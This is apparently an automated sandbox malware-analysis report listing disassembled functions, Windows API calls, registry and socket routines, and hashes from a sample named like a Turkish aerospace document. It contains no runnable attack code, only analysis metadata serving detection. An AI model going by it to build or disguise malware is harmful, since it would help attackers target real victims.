Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 498094c31e6219ab9c64cb98bbaf91c742b8b83aaecc8f74f45d32de731311d3
Instruction ID: 9d1116488bc65c24f7e7aa2f8ccc5cb8b00d073355186deae2cd2f972b20fb94
Opcode Fuzzy Hash: 498094c31e6219ab9c64cb98bbaf91c742b8b83aaecc8f74f45d32de731311d3
Instruction Fuzzy Hash: A241947584525C9FDF12EBA4DD81ADEB7B8AF18380F1000E6E505EB142EB34AB89CB50

Function 00212DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00212E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00212E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00212E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00212EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00212EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00212EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00212F0B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 1c546561cc86b49a0be8d1f4d380afd98630e39542013e3362b66d782b9077d8
Instruction ID: c449b868a78b4a0a09fd7a1963a3a5623ec25e3d358a6702dee945a739ebcf74
Opcode Fuzzy Hash: 1c546561cc86b49a0be8d1f4d380afd98630e39542013e3362b66d782b9077d8
Instruction Fuzzy Hash: 2C311234654251EFDB218F18EC88FA537E5EBAA711F244164F9109B2B2CB71FCA49B40

Function 001E7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001E7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001E778F
SysAllocString.OLEAUT32(00000000), ref: 001E7792
SysAllocString.OLEAUT32(?), ref: 001E77B0
SysFreeString.OLEAUT32(?), ref: 001E77B9
StringFromGUID2.OLE32(?,?,00000028), ref: 001E77DE
SysAllocString.OLEAUT32(?), ref: 001E77EC

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d7728b44bd7aeb96d67070a59d3f2dd80d1be4598aa04be935d9fa9806bf4873
Instruction ID: 756f8287e841b5f294cacad9bfd3d7606ca10f55aab3c615d8ef0eddd23c0060
Opcode Fuzzy Hash: d7728b44bd7aeb96d67070a59d3f2dd80d1be4598aa04be935d9fa9806bf4873
Instruction Fuzzy Hash: 1121947AA08219AFEB10AFA9DC8CCFF73ACEB093647148025B904DB190D7709C818760

Function 001E77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001E7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001E7868
SysAllocString.OLEAUT32(00000000), ref: 001E786B
SysAllocString.OLEAUT32 ref: 001E788C
SysFreeString.OLEAUT32 ref: 001E7895
StringFromGUID2.OLE32(?,?,00000028), ref: 001E78AF
SysAllocString.OLEAUT32(?), ref: 001E78BD

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 634e94cb6d9cf015b26a5c180839459a09a5dffb1dcf99e0ed440ccc798f573c
Instruction ID: a55cf13529896fa6e1320defbea2abb578bc5449732acb9c2ee86055cf2e8084
Opcode Fuzzy Hash: 634e94cb6d9cf015b26a5c180839459a09a5dffb1dcf99e0ed440ccc798f573c
Instruction Fuzzy Hash: A321BD35608214BFEB14AFA9DC8CDAE77ECEB283607208025F915CB2A0DB70DC41CB64

Function 001F04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 001F04F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001F052E

Strings

nul, xrefs: 001F0567

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: caff43b2bd8b50747f83dfa6e98e64248ef0cdcae0bab732e26e80a2001a0e91
Instruction ID: 6775858b2854d2dad1cfb4772ee16fdf7b3a6090250b38d32001a223942a90fd
Opcode Fuzzy Hash: caff43b2bd8b50747f83dfa6e98e64248ef0cdcae0bab732e26e80a2001a0e91
Instruction Fuzzy Hash: 5B218D75600309AFDF219F29DC08AAA77A4BF59724F204A19FEA1D72E1D7B0D940CF60

Function 001F05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 001F05C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001F0601

Strings

nul, xrefs: 001F0639

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: f65b4bc0e5feb21d8089e89d31ce811e8c987587667170027e2a72e993f47792
Instruction ID: 28f439b339ccf1355a06ef0189ef7282b57564c1cb0797da865424b76d33cd66
Opcode Fuzzy Hash: f65b4bc0e5feb21d8089e89d31ce811e8c987587667170027e2a72e993f47792
Instruction Fuzzy Hash: 1E21B7755003199FDB219F68DC04AAA77E4BF99730F204A19FEA1D72E1DBB09860CB50

Function 002140AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0018600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0018604C
Part of subcall function 0018600E: GetStockObject.GDI32(00000011), ref: 00186060
Part of subcall function 0018600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0018606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00214112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0021411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0021412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00214139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00214145

Strings

Msctls_Progress32, xrefs: 002140E3

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 551d96f6b0ab5f6d416c5ed69fb717584545e1f02bfbe24ae4d8d9744d0dde68
Instruction ID: ed1a344892a8d6a60a45510712fa72e1aab4049c0fa63db8ace8f6d3a007bf16
Opcode Fuzzy Hash: 551d96f6b0ab5f6d416c5ed69fb717584545e1f02bfbe24ae4d8d9744d0dde68
Instruction Fuzzy Hash: 6511B2B215021ABEEF119F64CC85EE77F9DEF19798F104110BA18A6050CB729C61DBA4

Function 001BD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001BD7A3: _free.LIBCMT ref: 001BD7CC

_free.LIBCMT ref: 001BD82D

Part of subcall function 001B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000), ref: 001B29DE
Part of subcall function 001B29C8: GetLastError.KERNEL32(00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000,00000000), ref: 001B29F0

_free.LIBCMT ref: 001BD838
_free.LIBCMT ref: 001BD843
_free.LIBCMT ref: 001BD897
_free.LIBCMT ref: 001BD8A2
_free.LIBCMT ref: 001BD8AD
_free.LIBCMT ref: 001BD8B8

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: cfbe860d1a3e488eb8047d251e91452b56a922e058cd627b1e906bebb77116e1
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 30112671940B14BADA25BFF0DC46FCB7B9CAF20704F400C25F29DA6092EB75A5098662

Function 001EDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001EDA74
LoadStringW.USER32(00000000), ref: 001EDA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001EDA91
LoadStringW.USER32(00000000), ref: 001EDA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 001EDADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 001EDAB9

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 2458f14d484986c1e0b58b7a61738241c55655e282f2823f8ab7459664c60113
Instruction ID: 76866adafe76a3395b96135e8b21f95cf93a77b40ad8bfe718f14e032931b6ce
Opcode Fuzzy Hash: 2458f14d484986c1e0b58b7a61738241c55655e282f2823f8ab7459664c60113
Instruction Fuzzy Hash: 180186FA9402487FE7109BA4AD8DEEB736CE718301F5044A2B706E2041EA749E844F75

Function 001F096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0170E190,0170E190), ref: 001F097B
EnterCriticalSection.KERNEL32(0170E170,00000000), ref: 001F098D
TerminateThread.KERNEL32(0170E188,000001F6), ref: 001F099B
WaitForSingleObject.KERNEL32(0170E188,000003E8), ref: 001F09A9
CloseHandle.KERNEL32(0170E188), ref: 001F09B8
InterlockedExchange.KERNEL32(0170E190,000001F6), ref: 001F09C8
LeaveCriticalSection.KERNEL32(0170E170), ref: 001F09CF

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 11e53eb329eadcf0c7bdbe8b835ff8b2fc143bce37fc22e18036d607d7027ba6
Instruction ID: 7a9f0c368d0feb405be22d4e3de98d631f703b5026d139988c9f6837496b38b2
Opcode Fuzzy Hash: 11e53eb329eadcf0c7bdbe8b835ff8b2fc143bce37fc22e18036d607d7027ba6
Instruction Fuzzy Hash: C1F03135482A12BBD7525F94FE8CBE67B35FF15702F505025F601508A1DB749465CF90

Function 00201C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00201DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00201DE1
WSAGetLastError.WSOCK32 ref: 00201DF2
htons.WSOCK32(?,?,?,?,?), ref: 00201EDB
inet_ntoa.WSOCK32(?), ref: 00201E8C

Part of subcall function 001E39E8: _strlen.LIBCMT ref: 001E39F2

Part of subcall function 00203224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,001FEC0C), ref: 00203240

_strlen.LIBCMT ref: 00201F35

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 37cbc6c87f93bcce17a9f7978890130130ab5909b49bfb604051525529e8e395
Instruction ID: 8e7bf522060ad6423873bb8ebe8f3371341c8cc6f1d1bdb7c15821ece4e30e11
Opcode Fuzzy Hash: 37cbc6c87f93bcce17a9f7978890130130ab5909b49bfb604051525529e8e395
Instruction Fuzzy Hash: C9B1E134204302AFD724EF24C889E2A7BE5AF95318F54854CF4565B2E3DB71EE52CB91

Function 001B01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 001B00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001B00D6
__allrem.LIBCMT ref: 001B00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001B010B
__allrem.LIBCMT ref: 001B0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001B0140

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 58a622e48056fdddd2172ff3c367851842538288250d9ce1b4bf6cb8d157f5ba
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: D7811976A00706AFE725AF6CCC82BAB73E8AF66364F24423EF411D7681E770D9018750

Function 001B61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001A82D9,001A82D9,?,?,?,001B644F,00000001,00000001,8BE85006), ref: 001B6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001B644F,00000001,00000001,8BE85006,?,?,?), ref: 001B62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001B63D8
__freea.LIBCMT ref: 001B63E5

Part of subcall function 001B3820: RtlAllocateHeap.NTDLL(00000000,?,00251444,?,0019FDF5,?,?,0018A976,00000010,00251440,001813FC,?,001813C6,?,00181129), ref: 001B3852

__freea.LIBCMT ref: 001B63EE
__freea.LIBCMT ref: 001B6413

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: b65dfef162773b3f92fefeea10701f89858dd86208f1666086a1a3e7f42e0393
Instruction ID: 2db1c2ac860cc6eccba3fb0c5d0da5dcc9fc4ed298c77fbeab39539a59584557
Opcode Fuzzy Hash: b65dfef162773b3f92fefeea10701f89858dd86208f1666086a1a3e7f42e0393
Instruction Fuzzy Hash: B351E072A00216ABEB258F64DC81EEF7BA9FB64710F254669FC09D6150EB38DC50C6A0

Function 0020BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

Part of subcall function 0020C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0020B6AE,?,?), ref: 0020C9B5
Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020C9F1
Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020CA68
Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0020BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0020BD25
RegCloseKey.ADVAPI32(00000000), ref: 0020BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0020BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0020BDF3
RegCloseKey.ADVAPI32(?), ref: 0020BDFF

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 56a5a32bb393433e540e4fa34053490dd9ce1129555147013617b3ace5683703
Instruction ID: ba778729dfb92f19cd5967fad938f55282d9ce2231d79db2f1bd0d73622d897c
Opcode Fuzzy Hash: 56a5a32bb393433e540e4fa34053490dd9ce1129555147013617b3ace5683703
Instruction Fuzzy Hash: 4A81AF30228342AFD725DF24C885E6ABBE5FF84308F14855DF4598B2A2DB31ED55CB92

Function 001DF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 001DF7B9
SysAllocString.OLEAUT32(00000001), ref: 001DF860
VariantCopy.OLEAUT32(001DFA64,00000000), ref: 001DF889
VariantClear.OLEAUT32(001DFA64), ref: 001DF8AD
VariantCopy.OLEAUT32(001DFA64,00000000), ref: 001DF8B1
VariantClear.OLEAUT32(?), ref: 001DF8BB

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 20fcb0e2a605e99f956dfca69bb519ec94888be536ff3b9eb0a8d07f5cba69f1
Instruction ID: 34ec0e81579535ef312fca68e0a4ebeb92afbf78b319c1f96c302640d8f4d783
Opcode Fuzzy Hash: 20fcb0e2a605e99f956dfca69bb519ec94888be536ff3b9eb0a8d07f5cba69f1
Instruction Fuzzy Hash: DC51D535940310BACF18AB65D8A5B29B3A8EF55314B24846FFD07DF391DB708E42CB96

Function 001F910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00187620: _wcslen.LIBCMT ref: 00187625

Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 001F94E5
_wcslen.LIBCMT ref: 001F9506
_wcslen.LIBCMT ref: 001F952D
GetSaveFileNameW.COMDLG32(00000058), ref: 001F9585

Strings

X, xrefs: 001F9412

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
